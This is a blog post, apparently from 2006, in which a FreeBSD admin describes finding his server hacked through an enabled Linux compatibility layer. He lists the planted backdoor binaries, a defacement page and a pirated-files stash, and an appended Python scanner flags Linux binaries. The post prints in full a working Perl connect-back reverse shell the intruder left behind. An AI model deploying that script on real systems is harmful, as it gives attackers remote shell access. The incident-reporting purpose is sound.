avaurus

freaky man on the silver mountain

Hacking FreeBSD - The Easy way

You might think FreeBSD is one of the most secure operating systems available, but even if you lock it down with the nice OpenBSD packet filter (pf), there are problems you can run into. In my case the following line in /etc/rc.conf was the reason for the server being hacked:
linux_enable="YES"
Set this to "NO" if you have this line. I noticed the "hack" when I realized that /tmp had grown rather big:
bash-2.05b# du -sh /tmp
 11G    /tmp
bash-2.05b#
Then I found the file "shell" in /tmp:
bash-2.05b# file /tmp/shell
/tmp/shell: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b#
Keep in mind that we are still talking about a FreeBSD box, and this is a Linux binary. I tried executing this file and it works. My firewall setup was secure from my point of view: I blocked everything and made only a few exceptions, passing HTTP and FTP over the ftp-proxy shipped with FreeBSD. Nothing else... SSH was only allowed from specific IPs, my home IP and the IP at work. After detecting that "shell" binary I disabled linux_enable and began to search for other exploits, and I found something. The next thing I found was the following script:
#!/usr/bin/perl
#
# A perl based connect back shell
#
# usage:
#
# $netcat -l -s 127.0.0.1 -p 10001
# $./cbs.pl 127.0.0.1 10001
#
# qobaiashi@u-n-f.com
#
use Socket;

$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';

$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($execute);
close(STDIN);
close(STDOUT);
Clever, and sad for me... The next file I found is "dc" in /tmp:
bash-2.05b# file dc
dc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b# ./dc
Data Cha0s Connect Back Backdoor

Usage: ./dc [Host] <port>
bash-2.05b#
OK, no comment... The next file I found is "index.php" in /tmp:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<div align="center"><img src="top.jpg" width="500" height="375"> <br>
  <font size="2" face="Tahoma"><strong><br>
  illusion boys i&aacute;&aacute;&aacute;&aacute;&aacute;&aacute;<br>
  a for&ccedil;a est&aacute; conosco :)<br>
  <br>
  <font color="#FF3399">filhote e lord_devil ;***</font></strong></font></div>
</body>
</html>
*phew*. I still had 11G in /tmp, so I searched for the directory that was taking the space:
bash-2.05b# du -sh .sess_f5854f3eee756bad71306289160389JJ
 11G    .sess_f5854f3eee756bad71306289160389JJ
bash-2.05b#
I got it!
bash-2.05b# ls .sess_f5854f3eee756bad71306289160389JJ
Benny.And.Joon-(Johnny_Deep).DvdRip.[By.Caly-AsTrA].avi LULA.3D-DEViANCE.rar                                    mybot.state
Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD1.avi         RAINBOW.SIX.LOCKDOWN-DEViANCE.rar                       mybot.state~
Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD2.avi         WINTER.CHALLENGE-DEViANCE.rar                           xh
Duma.2005.XviD-ITALiAN.DVDRIP.DeLuXe.avi                Winning_Eleven_9_International_Usa_PS2DVD-GAMEOVER.rar
Infodll.state                                           httpd
bash-2.05b#
Cool, warez on my server! Brrr... rm -rf ./*? No, I will do different things with those files... And another interesting file, "xh":
bash-2.05b# file xh
xh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b#
I deleted all that crap, set linux_enable to "NO" and hope that I am happy now.
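As an added example (not code from the post), here is a small Python scanner that does what `file` told the author above: it parses the ELF32 header and the GNU ABI-tag note to tell Linux binaries (the "for GNU/Linux 2.2.5" part) from native FreeBSD ones, so a cron job can flag foreign executables in /tmp instead of relying on a du surprise. The build_sample helper is an assumption of this example: it constructs minimal test images, not real binaries.

```python
import os, struct

PT_NOTE, NT_GNU_ABI_TAG = 4, 1
OSABI = {0: "SYSV", 3: "Linux", 9: "FreeBSD"}  # e_ident[EI_OSABI]
ABI_OS = {0: "Linux", 1: "Hurd", 2: "Solaris", 3: "FreeBSD", 4: "NetBSD"}  # GNU ABI-tag OS ids

def elf_target(data):
    """ELF32 LSB image -> (osabi, abi_tag); abi_tag = (os, (major, minor, patch)) from the GNU ABI-tag note or None."""
    if len(data) < 52 or data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        return None  # not an ELF32 little-endian image (the binaries in this post are all 32-bit)
    hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    osabi, tag = OSABI.get(data[7], str(data[7])), None
    for i in range(e_phnum):
        p_type, p_off, _, _, p_filesz = struct.unpack_from("<IIIII", data, e_phoff + i * e_phentsize)
        if p_type == PT_NOTE:
            seg, pos = data[p_off:p_off + p_filesz], 0
            while pos + 12 <= len(seg):  # walk the note entries of this segment
                namesz, descsz, ntype = struct.unpack_from("<III", seg, pos)
                name = seg[pos + 12:pos + 12 + namesz].rstrip(b"\0")
                pos += 12 + ((namesz + 3) & ~3)
                desc, pos = seg[pos:pos + descsz], pos + ((descsz + 3) & ~3)
                if name == b"GNU" and ntype == NT_GNU_ABI_TAG and descsz >= 16:
                    os_id, *kver = struct.unpack_from("<IIII", desc, 0)
                    tag = (ABI_OS.get(os_id, str(os_id)), tuple(kver))
    return osabi, tag

def is_linux_binary(data):
    """True when the image targets Linux (Linux OSABI or Linux ABI tag): on FreeBSD it only runs via the linuxulator."""
    t = elf_target(data)
    return t is not None and (t[0] == "Linux" or (t[1] is not None and t[1][0] == "Linux"))

def scan_dir(root, limit=1 << 20):
    """Yield Linux ELF32 binaries below root; only the first MiB of each regular file is read, so 11G of .avi costs little."""
    for d, _, files in os.walk(root):
        for p in (os.path.join(d, f) for f in files):
            if os.path.isfile(p) and not os.path.islink(p):
                with open(p, "rb") as fh:
                    if is_linux_binary(fh.read(limit)):
                        yield p

def build_sample(osabi, abi_tag_os=None, kver=(2, 2, 5)):
    """Constructed minimal ELF32 LSB image (header plus one PT_NOTE) used as test input; not a runnable program."""
    note = b""
    if abi_tag_os is not None:
        desc = struct.pack("<IIII", abi_tag_os, *kver)
        note = struct.pack("<III", 4, len(desc), NT_GNU_ABI_TAG) + b"GNU\0" + desc
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF" + bytes([1, 1, 1, osabi]) + bytes(8),
                       2, 3, 1, 0, 52, 0, 0, 52, 32, int(bool(note)), 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_NOTE, 84, 0, 0, len(note), len(note), 4, 4) if note else b""
    return ehdr + phdr + note
```

A binary with a SYSV OSABI and no ABI-tag note comes back as ("SYSV", None) and is not flagged, so any unexpected ELF in /tmp still deserves a look; with linux_enable="NO" a Linux binary cannot be executed at all.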


Comments

Unregistered user Thursday, April 13, 2006 2:57:51 PM

Anonymous writes: thanks, i had the same problem, very helpful

Unregistered user Saturday, June 10, 2006 11:26:35 PM

Anonymous writes: You need to *close* the hole which has been exploited by the attacker in the first place! But well, now everybody knows, you operate a vulnerable server with only the linuxulator disabled (so just bring your own rootkit).

Andreas Schipplock (avaurus) Thursday, October 26, 2006 9:55:30 PM

The hole was a PHP script, which I identified as the hole shortly after the detection. I set up the whole machine again some days after this detection.
